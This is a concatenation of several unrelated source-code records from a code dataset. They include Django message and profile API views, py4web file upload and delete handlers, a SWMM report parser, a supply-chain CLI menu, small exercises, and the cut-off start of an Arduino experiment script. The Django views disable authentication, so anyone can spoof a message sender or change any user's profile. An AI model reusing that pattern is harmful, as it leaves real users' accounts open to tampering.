get_user_model\n\nUser = get_user_model()\n\n\n\nclass SendMessageMPView(APIView):\n permission_classes = ()\n def post(self, request):\n data = SendMessageSerializer(data= request.data)\n\n data.is_valid(raise_exception=True)\n\n sender = data['sender'].value\n receiver = data['receiver'].value\n message = data['message'].value\n attached_file = data['attached_file'].value\n try:\n sender = User.objects.get(system_id_for_user=sender)\n receiver = User.objects.get(id=receiver)\n\n message = Message.objects.create(\n sender=sender,\n receiver=receiver,\n message=message,\n attached_file=attached_file\n )\n response = {\n \"message\": \"Message has been sent\"\n }\n except Exception as e:\n print(e)\n response = {\n \"message\":\"sorry, something went wrong, try again.\"\n } \n\n return Response(response, status=status.HTTP_200_OK) \n\nclass EditProfileView(APIView):\n permission_classes =()\n def post(self, request, id):\n user = User.objects.get(system_id_for_user=id)\n data =ProfileEditConstituentSerializer(data=request.data)\n\n data.is_valid(raise_exception=True)\n\n\n try:\n\n user.profile_picture = request.data['profile_picture']\n\n user.save()\n\n print(request.data['profile_picture'])\n\n data = {\n \"status\":status.HTTP_200_OK,\n \"message\":\"Profile has been updated.\",\n # \"pic\":user.profile_picture\n }\n return Response(data, status=status.HTTP_200_OK)\n\n \n except Exception as e:\n print(e)\n data = {\n \"status\":status.HTTP_400_BAD_REQUEST,\n \"message\":\"Profile was not updated.\",\n # \"pic\":user.profile_picture\n }\n return Response(data, status=status.HTTP_400_BAD_REQUEST)\n\n\n\n \n\n","sub_path":"general/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"2966757","text":"'''\nRepeating Letters\nCreate a function that takes a string and returns a string in which each character is repeated once.\nExamples\n\"String\" ➞ \"SSttrriinngg\"\n\n\"Hello World!\" ➞ \"HHeelllloo WWoorrlldd!!\"\n\n\"1234!_ \" ➞ \"11223344!!__ \"\nNotes\nAll test cases contain valid strings. Don't worry about spaces, special characters or numbers. They're all considered valid characters.\n'''\n\ndef double_char(txt):\n new_txt = ''\n for item in txt:\n new_txt += item * 2\n return new_txt\n\nprint(double_char('Hello World!'))\n","sub_path":"Algorithms/Python/edabit-Algorithms/repeating_letters.py","file_name":"repeating_letters.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"32831420","text":"#! /usr/local/bin/python3\n# encoding: utf-8\n\n\"\"\"\nThis modules creates text output report based on moorings' latest mdr file\n\"\"\"\n\nprint(\"Content-Type: text/plain\\n\\n\")\n\n### GO TO PROJECT HEAD ###\nif __name__ == \"__main__\": import context\n\n### STANDARD-LIB IMPORTS ###\nimport os\n\n### 3RD-PARTY IMPORTS ###\nNone\n\n### GLIDEROPS IMPORTS ###\nfrom gliderops.util import *\nimport gliderops.dataman.parsers.mdr_parser as mdr_parser\nfrom gliderops.dataman.gmcbutler import find_glider_files\n\n\n## DATA SETUP ##\ndef main():\n srcs = find_glider_files(filename = '??.mdr')\n srcs = sorted([mdr_parser.parse(src)[1] for src in srcs], key = lambda x: x.mtime, reverse= True)\n moor = []\n for src in srcs[:]:\n if (src.station_name(),src.mooring_name()) not in [(mdr.station_name(),mdr.mooring_name()) for mdr in moor] and src.mooring_name() is not None:\n moor.append(src)\n\n rem_station = ''\n lines = []\n for mdr in sorted(moor, key = lambda x: x.platformID):\n if rem_station != mdr.station_name():\n rem_station = mdr.station_name()\n lines.append('{} ({})'.format(rem_station, e2ts(mdr.mtime)))\n\n lines.append(' {} = {}'.format(mdr.mooring_name(),mdr.filename))\n lines.append(' Gap Sum = {} kb'.format(mdr.gap_sum()/10**3))\n lines.append(' Gap Num = {}'.format(mdr.gap_num()))\n lines.append(' Percent Collected = {} %'.format(mdr.percent()))\n lines.append(' Total Collected = {} kb'.format(mdr.collected()/10**3))\n lines.append('')\n\n with open(os.path.join('gliderops','report','output', 'mdr_report.txt'), 'w') as f:\n for line in lines:\n f.write(line + os.linesep)\n\nif __name__ == '__main__':\n main()\n\n\n","sub_path":"gliderops/report/mdr_report.py","file_name":"mdr_report.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"158704429","text":"\"\"\"\nswmmread.py\nRead SWMM input file and create objects for each input category\nAlso read the resulting output file after SWMM is runcp\n2013 Arthur McGarity\nSwarthmore College\nAEM: Modified 11/2015 to include LID categories in input file\n\"\"\"\nimport sys\nimport numpy as np \nimport pandas as pd \n\n#from swmm_objects import *\n\ndef read_inp(swmmInpStr):\n# read SWMM inp file fname into a large string\n# create a list \"section_names\" containing the names of the sections found in the file\n# create a dictionary \"sections\" containing the data lines found in each section keyed by section_name\n# finally, return \"section_names\" and \"sections\"\n# NOTE: the calling program is responsible for parsing the data lines in the sections\n\n# fname = \"Example4_bare_PHL.inp\"\n data = swmmInpStr\n section_names = [] # we will build this list from section names found in the SWMM .inp file\n# remove comment lines and blank lines and identify all section names used in the file\n data1 = []\n for line in data:\n line_ns = line.strip() # remove whitespace\n if line_ns.startswith('['):\n section_names.append(line_ns)\n elif line_ns.startswith(';;'): # do not include comment ines\n continue\n elif not line_ns: # do not include blank lines\n continue\n data1.append(line) # data1 is a list containing the unstripped lines of the SWMM .inp file \n# now find all data lines in each section, store each data line as an entry in a section_list\n# then after reading all the data in a section, store the section_list in\n# dictionary sections keyed by the section name\n sections = {} # dictionary to hold all lines in a section, keyed by section_names\n end = False\n for i in range(len(data1)):\n line = data1[i]\n line_ns = line.strip() # remove whitespace\n if line_ns in section_names:\n name = line_ns\n section_list = []\n try:\n next_line = data1[i+1] # look ahead at next line\n except IndexError:\n end = True # end of input file found\n next_line_ns = next_line.strip() # remove whitespace\n if (end or (next_line_ns in section_names)): # we have read the entire section\n sections[name] = section_list # store the list in the dictionary\n else:\n section_list.append(line) # store section data in section_list\n try:\n next_line = data1[i+1] # look ahead at next line\n except IndexError:\n end = True\n next_line_ns = next_line.strip() # remove whitespace\n if (end or (next_line_ns in section_names)):\n sections[name] = section_list #populate the sections dictionary\n# for i in section_names:\n# sys.stdout.write(\"%s\\n\" % i)\n# for j in sections[i]:\n# sys.stdout.write(j) \n return((section_names,sections)) # return the section_names LIST and the sections DICTIONARY (keyed by items in the section_names list)\n\ndef read_outflow_series(fname):\n infile = open(fname,'r')\n data = infile.readlines()\n node_results = \"Node Results\"\n found_outfall = False\n hours = [] #empty lists to be appended with data\n outflows = []\n for line in data:\n if node_results in line: #starting in node results section\n found_outfall = True\n if found_outfall:\n line_list = line.split()\n if len(line_list) > 2:\n time = line_list[0] # get date from list\n if len(time) == 11: #so that only node results section will be recorded\n hours.append(time)\n out = line_list[2] #get outflow from list\n outflows.append(out)\n return (outflows)\n\ndef read_runoff(fname):\n infile = open(fname,'r')\n data = infile.read()\n outfall_start_index = data.find('Runoff Quantity Continuity')\n output_start_index = data.find('Surface ',outfall_start_index)\n split = data[output_start_index:].split('\\n',1)\n output_line = split[0]\n output_list = output_line.split()\n #print(output_list)\n runoff = output_list[3]\n return (runoff)\n\ndef read_evaporation(fname):\n infile = open(fname,'r')\n data = infile.read()\n outfall_start_index = data.find('Runoff Quantity Continuity')\n output_start_index = data.find('Evaporation',outfall_start_index)\n split = data[output_start_index:].split('\\n',1)\n output_line = split[0]\n output_list = output_line.split()\n #print(output_list)\n evaporation = output_list[3]\n return (evaporation)\n\ndef read_infiltration(fname):\n infile = open(fname,'r')\n data = infile.read()\n outfall_start_index = data.find('Runoff Quantity Continuity')\n output_start_index = data.find('Infiltration',outfall_start_index)\n split = data[output_start_index:].split('\\n',1)\n output_line = split[0]\n output_list = output_line.split()\n #print(output_list)\n infiltration = output_list[3]\n return (infiltration)\n\ndef read_precipitation(fname):\n infile = open(fname,'r')\n data = infile.read()\n outfall_start_index = data.find('Runoff Quantity Continuity')\n output_start_index = data.find('Total',outfall_start_index)\n split = data[output_start_index:].split('\\n',1)\n output_line = split[0]\n output_list = output_line.split()\n # print(output_list)\n precipitation = output_list[3]\n return (precipitation)\n\ndef read_report(fname, ratio):\n infile = open(fname,'r')\n data = infile.read()\n # find and parse the External Outflow line\n external_flow_index = data.find('External Outflow')\n if external_flow_index >= 0: # The External Outflow line is found\n lineList = data[external_flow_index:].split('\\n',1)\n wordlist = lineList[0].split()\n volume = float(wordlist[4])\n else:\n volume = None\n # find and parse the LID Performance Summary\n lid_start_index = data.find('LID Performance Summary')\n if lid_start_index >= 0: # The LID Performance Summary section is in the output file\n lid_subcatchment_heading_index = data.find('Subcatchment',lid_start_index)\n remaining_lines = data[lid_subcatchment_heading_index:].split('\\n') \n #line_after_section = ' '\n i = 2\n lid_performance = []\n while True:\n if remaining_lines[i].strip() == '': # Blank line found\n break\n lid_performance.append(remaining_lines[i])\n i = i + 1\n lid_dict = {}\n series_dict = {}\n for line in lid_performance:\n this_lid_dict = {}\n labels = ['Total Inflow', 'Evap Loss', 'Infil Loss', 'Surface Outflow', 'Drain Outflow', \n 'Initial Storage', 'Final Storage', 'Continuity Error']\n wordlist = line.split() \n idx = wordlist[0] + ' ' + wordlist[1] # string containing subcatchment name and lid name\n values = wordlist[2:]\n i = 0;\n for label in labels:\n this_lid_dict[label] = float(values[i])\n i += 1\n lid_dict[idx] = this_lid_dict # to be stored in mongo database\n # construct a Pandas dataframe:\n #series_dict[idx] = pd.Series(values, index = labels) \n #lid_report = pd.DataFrame(series_dict)\n else:\n lid_dict = None\n lid_report = None\n # find and parse the Outfall Loading Summary \n outfall_start_index = data.find('Outfall Loading Summary')\n output_start_index = data.find('System',outfall_start_index)\n split = data[output_start_index:].split('\\n',1)\n output_line = split[0]\n output_list = output_line.split()\n peak = float(output_list[3])\n volume = float(output_list[4])\n # peak = None\n runoff = read_runoff(fname)\n evaporation = read_evaporation(fname)\n infiltration = read_infiltration(fname)\n precipitation = read_precipitation(fname)\n \n\n #calculating cso volume\n outflow_values = []\n out = read_outflow_series(fname)\n outflow_values.append(out)\n cso_flow = 0\n hours = 0\n tot_flow = 0\n max_treatment = 3122*ratio\n for i in outflow_values: #out_variables is list within list (though outer list is just one element)\n tot = len(i)\n for j in i: \n if float(i) > max_treatment: #ratio method\n tot_flow += float(i)\n cso = float(i) - max_treatment\n cso_flow += cso \n hours += 1\n tot_volume = tot_flow*900*7.48052 #convert to gallons, and seconds in an hour\n cso_volume = cso_flow*900*7.48052 #for seconds in a hour\n #equiv_rat = cso_volume/tot_volume #equivalency ratio\n treated_volume = tot_volume - cso_volume\n\n return (peak,volume,cso_volume,runoff,evaporation,infiltration,precipitation,lid_dict)\n # peak and volume are strings. lid_dict is a dictionary of dicts\n\n","sub_path":"swmm_read_cso.py","file_name":"swmm_read_cso.py","file_ext":"py","file_size_in_byte":8485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"194088339","text":"import os, json, uuid, datetime\nfrom py4web import action, request, response, abort, redirect, URL, Field\nfrom .common import db, session, T, cache, authenticated, unauthenticated, auth\nfrom py4web.utils.form import Form, FormStyleBulma, FormStyleDefault\nfrom .settings import APP_NAME, UPLOAD_FOLDER\nfrom pydal.validators import IS_NOT_EMPTY, IS_INT_IN_RANGE, IS_IN_SET, IS_IN_DB\nfrom yatl.helpers import A, I, SPAN, XML, DIV, P, TABLE, THEAD, TR, TD, TBODY, H6, IMG\n\nfrom .atab_utils import sql2table\n\n\ndef get_unique_name(orig_name='', default_len=10):\n if orig_name:\n orig_name = orig_name[:default_len] + '_'\n suffix = datetime.datetime.now().strftime(\"%Y%m%d_%H%M%S_\")\n return \"_\".join(['at', suffix]) +orig_name + str(uuid.uuid4())\n\ndef data2file( data, fnm, mode = 'wb' ):\n with open(fnm, mode) as f:\n f.write( data )\n return fnm\n\n@action(\"p4wdownload_file\", method=[\"GET\", \"POST\"])\n@action.uses(session, db, auth, \"p4wdownload_file.html\")\ndef p4wdownload_file():\n tbl = dict(request.query).get('t_', '') \n if not tbl in db.tables:\n return f\"bad table: {tbl}\"\n id_ = dict(request.query).get('id_', 1)\n try:\n id = int(id_)\n except ( ValueError, TypeError) :\n id = 1\n\n\n r = db[tbl](id)\n if r is None:\n return f\"bad id: {id}\"\n\n orig_fnm = r.orig_file_name\n\n fpath = os.path.join( UPLOAD_FOLDER , r.uniq_file_name )\n\n return file2browser ( fpath , orig_fnm )\n\n\ndef file2browser( file_path , orig_fnm = 'orig_fnm' ): \n import mimetypes\n mimetypes.init()\n\n file_content = '';\n\n try:\n with open(file_path, 'rb') as f:\n file_content= f.read()\n except IOError:\n file_content = f\"Error: File {orig_fnm} {file_path} does not appear to exist\"\n\n ext = os.path.splitext( orig_fnm )\n tru_ext = ext[1].lower() if len(ext) and len(ext[1]) else ''\n\n file_type = mimetypes.types_map.get(tru_ext, None)\n view_in_browser =('.pdf','.jpeg','.txt','.jpg','.jpe','.png','.gif','.tif','.tiff','.bmp','.svg','.ico')\n\n response.headers['Content-Type'] = 'application/octet-stream' if file_type is None else file_type\n\n response.headers['Content-disposition'] = 'inline; filename=\\\"%s\"' % ( orig_fnm) \\\n if not file_type is None and tru_ext.endswith( view_in_browser ) \\\n else 'attachment; filename=\\\"%s\"' % ( orig_fnm)\n return file_content\n\n\n@action(\"p4wdelete_file\", method=[\"GET\", \"POST\"])\n@action.uses(session, db, auth, )\n#@action.uses(session, db, auth, \"p4wdelete_file.html\")\ndef p4wdelete_file():\n tbl = dict(request.query).get('t_', '')\n if not tbl in db.tables:\n return f\"bad table: {tbl}\"\n id_ = dict(request.query).get('id_', 0)\n try:\n id = int(id_)\n except ( ValueError, TypeError) :\n return f\"bad id: {id_}\"\n #return f\"{tbl} {id}\"\n\n r = db[tbl](id)\n if r is None:\n return f\"bad id: {id}\"\n\n file_path = os.path.join( UPLOAD_FOLDER , r.uniq_file_name )\n\n if os.path.isfile( file_path ):\n os.remove( file_path )\n\n db(db[tbl].id == id ).delete()\n db.commit()\n redirect(URL('p4wupload_file', vars=dict(t_=tbl, id_=id) ))\n \n\n#---------------------------------------------------------------------------------------------------------\n\nfrom py4web.utils.form import Form, FormStyleBulma, FormStyleDefault\nfrom .settings import APP_NAME, UPLOAD_FOLDER\nfrom pydal.validators import IS_NOT_EMPTY, IS_INT_IN_RANGE, IS_IN_SET, IS_IN_DB\n\nfrom .common import flash\n\n@action(\"p4wupload_file\", method=[\"GET\", \"POST\"])\n@action.uses(flash, session, db, T, \"p4wupload_file.html\")\ndef p4wupload_file():\n\n t_id = dict(request.query).get('id_', '0')\n #if t_id != '0': \n # flash.set(f\"deleted id={t_id}\", sanitize=True)\n\n if not os.path.isdir(UPLOAD_FOLDER):\n return f\"bad upload path: {UPLOAD_FOLDER}\"\n\n messages= []\n tbl = 'uploaded_files'\n upload_field = 'image'\n upload_form = Form(\n [\n Field( upload_field, 'upload', requires=IS_NOT_EMPTY(),),\n Field(\"remark\", default='mycomment' ),\n ],\n formstyle=FormStyleDefault,\n )\n\n if upload_form.accepted and hasattr(request, 'files') :\n bottle_class=request.files.get( upload_field, None)\n if bottle_class:\n image_file = bottle_class.raw_filename\n image_content = bottle_class.file.read()\n uniq_file_name = get_unique_name( )\n fnm2 = os.path.join( UPLOAD_FOLDER , uniq_file_name )\n with open(fnm2, 'wb') as f:\n f.write( image_content )\n row = dict( orig_file_name = image_file, uniq_file_name=uniq_file_name, remark=upload_form.vars['remark'] )\n if db[tbl].insert(**db[tbl]._filter_fields(row)):\n db.commit()\n\n elif upload_form.errors:\n messages.append( f\"upload_form has errors: {upload_form.errors}\")\n\n\n hlinks = [\"save\", \"del\"]\n\n links = [\n lambda tx, r_id: A(\n f\"save:[{r_id}]\",\n _title='save file to disk',\n _href=URL(f\"p4wdownload_file\", vars=dict(t_=tx, id_=r_id)),\n ),\n\n lambda tx, r_id: A(\n f\"del:[{r_id}]\",\n _title=\"run p4wdelete_file\",\n _href=URL(f\"p4wdelete_file\", vars=dict(t_=tx, id_=r_id)),\n ),\n\n ]\n\n fld_links = {\n # 'id': lambda tx, xx, r_id: A(\n # f'save[{r_id}]',\n # _title='save file to disk',\n # _href=URL(f\"p4wdownload_file\", vars=dict(t_=tx, x_=xx, id_=r_id)),\n # ),\n 'time': lambda tx, xx, r_id: SPAN( xx.strftime(\"%d.%m.%Y %H:%M:%S\"), _style=\"color:red\" ), \n }\n\n mygrid = sql2table( tbl, db, links=links, hlinks=hlinks, fld_links=fld_links, items_on_page = 2, caller=\"p4wupload_file\", page_d=dict(request.query))\n return dict( messages=messages, upload_form=upload_form, mygrid=mygrid ) \n\n#---------------------------------------------------------------------------------------------------------\n","sub_path":"volt/upload_utils.py","file_name":"upload_utils.py","file_ext":"py","file_size_in_byte":6025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"47772794","text":"# import info_show\r\n# import data_update as update\r\n# import crt_inv_cmd as crt\r\n# import statis_fcst as fcst\r\n# import mi\r\n# import re\r\nimport public_function as pb_fct\r\n\r\n\r\nclass SystemIndex:\r\n bu_name = None\r\n user_name = None\r\n bu_name_lst = {\r\n \"Jeffrey\": \"TU\",\r\n \"Cecilia\": \"CMFT\",\r\n \"Yuanzhi\": \"PT\",\r\n \"Raymond\": \"JT\",\r\n \"Doris\": \"Spine\",\r\n \"Tina\": \"MT\"\r\n }\r\n \r\n def __init__(self):\r\n pass\r\n\r\n # command list\r\n # code - show the information by code\r\n # h5, hierarchy, group - show the information by h5, including whole bu\r\n # update - update data, including master data and sales & inventory data\r\n # export - export to excel file\r\n # hospital_sales - show the chart of hospital sales\r\n # 000 or click - turn to oneclick page\r\n # mi - turn to mi page\r\n # help - help page\r\n # 888 or forecast or fcst - generate statistical forecast\r\n # switch - switch the user\r\n # exit - quit the system\r\n\r\n def _display_general_command_mode(self):\r\n print(\"=== Please wait a few seconds for module loading ===\")\r\n import data_display\r\n # Get cmd_code and cmd_extension with split character \"-\"\r\n cmd_info_index = data_display.DataDisplay(self.__class__.bu_name, self.__class__.user_name)\r\n cmd_code = input(\"cmd >> \").strip().upper()\r\n # define different cmd code by cmd_code\r\n while cmd_code not in ['EXIT', 'SWITCH']:\r\n if cmd_code in [\"915\", 'CONSOLIDATE', 'CON']:\r\n from data_update import MasterDataConsolidation\r\n data_input = MasterDataConsolidation(self.__class__.bu_name)\r\n data_input.master_data_update_entrance()\r\n elif cmd_code == \"500\":\r\n from hospital_sales_calculation import HospitalSalesCalculation\r\n hospital_sale_review = HospitalSalesCalculation(self.__class__.bu_name)\r\n hospital_sale_review.start_generate_AIO_chart()\r\n elif cmd_code in [\"000\", 'ONECLICK', 'CLICK', 'K']:\r\n import crt_inv_cmd as crt\r\n cmd_crt_inv = crt.CurrentInventoryMenu(self.__class__.bu_name)\r\n cmd_crt_inv.crt_inv_entrance()\r\n elif cmd_code in ['777', 'SNOP']:\r\n import snop_export_v2 as snop\r\n data_export = snop.SNOPExportEntrance(self.__class__.bu_name)\r\n data_export.start_snop_export()\r\n elif cmd_code in [\"888\", 'FCST', 'FORECAST']:\r\n import statis_fcst as fcst\r\n forecast_view = fcst.GetStatisticalForecast(self.__class__.bu_name)\r\n forecast_view.get_forecast_entrance()\r\n elif cmd_code in [\"999\", 'MI']:\r\n import mi\r\n add_mi = mi.MI(self.__class__.bu_name)\r\n add_mi.mi_start()\r\n elif cmd_code in [\"111\", 'HELP']:\r\n cmd_info_index.show_command_list()\r\n elif cmd_code in ['CODE', 'C']:\r\n self._display_code_command_mode()\r\n elif cmd_code in ['H5', 'HIERARCHY', 'GROUP', 'H']:\r\n self._display_h5_command_mode()\r\n elif cmd_code in ['UPDATE', 'U']:\r\n self._display_update_command_mode()\r\n elif cmd_code in ['BU_UPDATE', 'BMU']:\r\n self._display_bu_master_data_update_command_mode()\r\n elif cmd_code in ['PUBLIC_UPDATE', 'PMU']:\r\n self._display_public_master_data_update_command_mode()\r\n else:\r\n print(\"!!ERROR: Wrong CMD code. Plz input right cmd code, or input exit to quit.\")\r\n cmd_code = input(\"cmd >> \").strip().upper()\r\n if cmd_code == \"SWITCH\":\r\n self.__class__.bu_name, self.__class__.user_name = None, None\r\n self.login_control()\r\n elif cmd_code == 'EXIT':\r\n pb_fct.display_ascii_graph(\"goodbye\")\r\n else:\r\n pass\r\n\r\n def _display_code_command_mode(self):\r\n from data_display import CodeDataDisplay\r\n code_info_display = CodeDataDisplay(self.__class__.bu_name, self.__class__.user_name)\r\n cmd_input = input('cmd >> code_display >> ').replace(' ', '').upper().split('-')\r\n code_input = cmd_input[0]\r\n cmd_extension = cmd_input[1] if len(cmd_input) > 1 else 'X'\r\n while code_input.upper() not in ['RETURN', 'EXIT']:\r\n if not code_input:\r\n pass\r\n elif cmd_extension == 'X':\r\n code_info_display.show_code_all_info(code_input)\r\n elif cmd_extension == 'G':\r\n code_info_display.show_code_chart(code_input)\r\n else:\r\n print('!! Warning - Wrong extension, please input again')\r\n # continue to show the command list\r\n cmd_input = input('cmd >> code_display >> ').replace(' ', '').upper().split('-')\r\n code_input = cmd_input[0]\r\n cmd_extension = cmd_input[1] if len(cmd_input) > 1 else 'X'\r\n\r\n def _display_h5_command_mode(self):\r\n from data_display import HierarchyDataDisplay\r\n h5_info_display = HierarchyDataDisplay(self.__class__.bu_name, self.__class__.user_name)\r\n cmd_input = input('cmd >> hierarchy5_display >> ').replace(' ', '').upper().split('-')\r\n h5_name_input = cmd_input[0]\r\n cmd_extension = cmd_input[1] if len(cmd_input) > 1 else 'X'\r\n mth_qty = min(int(cmd_input[2]), 24) if len(cmd_input) > 2 and cmd_input[2].isdecimal() else 12\r\n while h5_name_input.upper() not in ['RETURN', 'EXIT']:\r\n if not h5_name_input:\r\n pass\r\n elif cmd_extension == 'X':\r\n h5_info_display.show_h5_all_info(h5_name_input, mth_qty)\r\n elif cmd_extension == 'G':\r\n h5_info_display.show_h5_chart(h5_name_input)\r\n else:\r\n print('!! Warning - Wrong extension, please input again')\r\n # continue to show the command list\r\n cmd_input = input('cmd >> hierarchy5_display >> ').replace(' ', '').upper().split('-')\r\n h5_name_input = cmd_input[0]\r\n cmd_extension = cmd_input[1] if len(cmd_input) > 1 else 'X'\r\n mth_qty = min(int(cmd_input[2]), 24) if len(cmd_input) > 2 and cmd_input[2].isdecimal() else 12\r\n\r\n def _display_update_command_mode(self):\r\n from data_update import MonthlyUpdate\r\n monthly_update = MonthlyUpdate(self.__class__.bu_name)\r\n cmd_input = input('cmd >> data_update >> ').replace(' ', '').upper().split('-')\r\n update_item = cmd_input[0]\r\n while update_item.upper() not in ['RETURN', 'EXIT']:\r\n if update_item in ['GTS', 'G']:\r\n monthly_update.update_sales('GTS')\r\n elif update_item in ['LPSALES', 'L', 'N', 'NED', 'LP', 'NEDSALES']:\r\n monthly_update.update_sales('LPSales')\r\n elif update_item in ['IMS', 'I']:\r\n monthly_update.update_sales('IMS')\r\n elif update_item in ['JNJINV', 'JI', 'JNJ_INV']:\r\n monthly_update.update_jnj_inventory()\r\n elif update_item in ['NEDINV', 'NI', 'NED_INV', 'LPINV', 'LI']:\r\n monthly_update.update_lp_inv()\r\n elif update_item in ['FCST', 'F', 'FORECAST']:\r\n monthly_update.update_final_forecast()\r\n elif update_item in ['ESO', 'E']:\r\n monthly_update.update_eso()\r\n else:\r\n print('!! Warning - Wrong extension, please input again')\r\n cmd_input = input('cmd >> data_update >> ').replace(' ', '').upper().split('-')\r\n update_item = cmd_input[0]\r\n\r\n def _display_bu_master_data_update_command_mode(self):\r\n from data_update import MasterDataUpdate\r\n master_data_update = MasterDataUpdate(self.__class__.bu_name)\r\n print(\"-- Import BU Level Master Data for %s -- \" % self.__class__.bu_name)\r\n print(\"Please Choose Master Data Type (1 - PM_List, 2 - SAP_Price, 3 - Phoenix_List, 4 - ROP_Setting, \"\r\n \"5 - ABC Ranking, 6 - NPI List)\")\r\n dict_master_data = {'1': 'PM_List', '3': 'Phoenix_List', '4': 'ROP_Setting', '6': 'NPI_List'}\r\n cmd_input = input('cmd >> bu_master_data_update >> ').replace(' ', '').upper().split('-')\r\n update_item = cmd_input[0]\r\n while update_item.upper() not in ['RETURN', 'EXIT']:\r\n data_type = ''\r\n if update_item in dict_master_data:\r\n data_type = dict_master_data[update_item]\r\n elif update_item == '2':\r\n master_data_update.import_sap_price_excel()\r\n print(\"SAP_Price is imported\")\r\n elif update_item == '5':\r\n master_data_update.generate_tu_abc_ranking()\r\n print('ABC Ranking Template Done.~')\r\n else:\r\n print(\"!!Wrong code, please try again!\")\r\n # if the data type is assigned, update the related data\r\n if data_type:\r\n master_data_update.import_bu_master_data(data_type)\r\n cmd_input = input('cmd >> bu_master_data_update >> ').replace(' ', '').upper().split('-')\r\n update_item = cmd_input[0]\r\n\r\n def _display_public_master_data_update_command_mode(self):\r\n from data_update import MasterDataUpdate\r\n public_master_data_update = MasterDataUpdate(self.__class__.bu_name)\r\n print(\"-- Import Public Master Data -- \")\r\n print(\"Please Choose Master Data Type (1 - Material Master, 2 - RAG Report, 3 - GTIN)\")\r\n dict_public_master_data = {'1': \"MATERIAL_MASTER\", '2': \"RAG_Report\", '3': 'GTIN'}\r\n cmd_input = input('cmd >> bu_master_data_update >> ').replace(' ', '').upper().split('-')\r\n update_item = cmd_input[0]\r\n while update_item.upper() not in ['RETURN', 'EXIT']:\r\n if update_item in dict_public_master_data:\r\n data_type = dict_public_master_data[update_item]\r\n public_master_data_update.import_public_master_data(data_type)\r\n else:\r\n print(\"!!Wrong code, please try again!\")\r\n cmd_input = input('cmd >> bu_master_data_update >> ').replace(' ', '').upper().split('-')\r\n update_item = cmd_input[0]\r\n\r\n def login_control(self):\r\n name = input(\"Please input your name: \")\r\n if name.capitalize() in self.bu_name_lst:\r\n self.__class__.user_name = name.capitalize()\r\n self.__class__.bu_name = self.bu_name_lst[self.__class__.user_name]\r\n pb_fct.display_ascii_graph(\"welcome\")\r\n print(\"** Welcome %s. Now you are handling %s **\" % (self.__class__.user_name, self.__class__.bu_name))\r\n self._display_general_command_mode()\r\n else:\r\n print(\"!!Error: wrong user name, please restart the program.\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n new_login = SystemIndex()\r\n new_login.login_control()\r\n\r\n # 方法2获取所有的代码信息并导出到excel\r\n # result = info_check.generate_code_detail_v2()\r\n # info_check.export_to_excel(result)\r\n # 方法1获取所有的代码信息并导出到excel\r\n # result = info_check.generate_code_detail()\r\n # info_check.export_to_excel(result)\r\n","sub_path":"antares/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"264277967","text":"#=================================\n# importing modules\n#=================================\nimport stack\n\n\n#=================================\n# Welcome\n#=================================\nprint(\"This program can determine if a given string is a palindrome\\n\")\nprint(\"(Enter return to exit)\")\n\n#=================================\n# init\n#=================================\nchar_stack = stack.getStack()\nempty_string = ''\n\n#=================================\n# get string from user\n#=================================\nchars = input(\"Enter string to check: \")\n\nwhile chars != empty_string:\n if(len(chars) == 1):\n print(\"A one letter word is by definition a palindrome\\n\")\n else:\n # init\n is_palindrome = True\n\n # to handle strings of odd length\n compare_length = len(chars) // 2\n\n # push the second half of input string on stack\n for k in range(compare_length, len(chars)):\n stack.push(char_stack, chars[k])\n\n # pop chars and compare to first half of string\n k = 0\n while k < compare_length and is_palindrome:\n ch = stack.pop(char_stack)\n if chars[k].lower() != ch.lower():\n is_palindrome = False\n\n k = k + 1\n\n # display results\n if is_palindrome:\n print(chars, 'is a palindrome\\n')\n else:\n print(chars, 'is NOT a palindrome\\n')\n\n # get next string from user\n chars = input(\"Enter string to check: \")","sub_path":"palindrom.py","file_name":"palindrom.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"364282498","text":"# -*- coding: utf-8 -*-# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 17 11:04:30 2019\n\n@author: paula\n\"\"\"\n\nimport serial, time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\nimport os\nfrom itertools import permutations \nimport glob\n#%% Description\n\n#==============================================================================\n# Saves: - a file per block containing information about all trials in it: their condition and whether if they were valid or not\n# - a file per trial containing the raw data from it\n# - a file per trial containing extracted data from it\n#==============================================================================\n\n#%% Communicate with arduino\n\narduino = serial.Serial('/dev/ttyACM0', 9600)\n#arduino = serial.Serial('/COM3', 9600)\n\n#%% Test arduino communication\n\nmessage = \";S%c;F%c;N%c;A%d;I%d;n%d;X\" % ('R', 'L','B', 3, 500, 10)\narduino.write(message)\n\n#%% Definitions\n\n# define Python user-defined exceptions\nclass Error(Exception):\n \"\"\"Base class for other exceptions\"\"\"\n pass\n\n# define variables\n\nISI = 500;\t\t# interstimulus interval (milliseconds)\nn_stim = 15;\t# number of bips within a sequence\n\n# all possible conditions for stimulus and feedback\nall_conditions = [['L','L'], ['L','R'], ['L','N'], ['R','L'], ['R','R'], ['R','N'], ['B','L'], ['B','R'], ['B','N'],['B','B']];\n\n# condition dictionary so we can choose the condition without going through number position\ncondition_dictionary = {\"LL\": 0,\"LR\": 1,\"LN\": 2,\"RL\": 3,\"RR\": 4,\"RN\": 5,\"BL\": 6,\"BR\": 7,\"BN\": 8,\"BB\": 9};\n\n# conditions chosen for the experiment\nconditions_chosen_index = [\n condition_dictionary[\"LL\"],\n condition_dictionary[\"LR\"],\n condition_dictionary[\"RL\"],\n condition_dictionary[\"RR\"],\n condition_dictionary[\"BB\"]\n];\n\n# list of all possible permutations of conditions\nall_possible_orders_conditions = list(permutations(conditions_chosen_index))\n\n# total number of blocks (equal to number of conditions since we have one condition per block)\nN_blocks = len(conditions_chosen_index);\n# number of trials per condition per 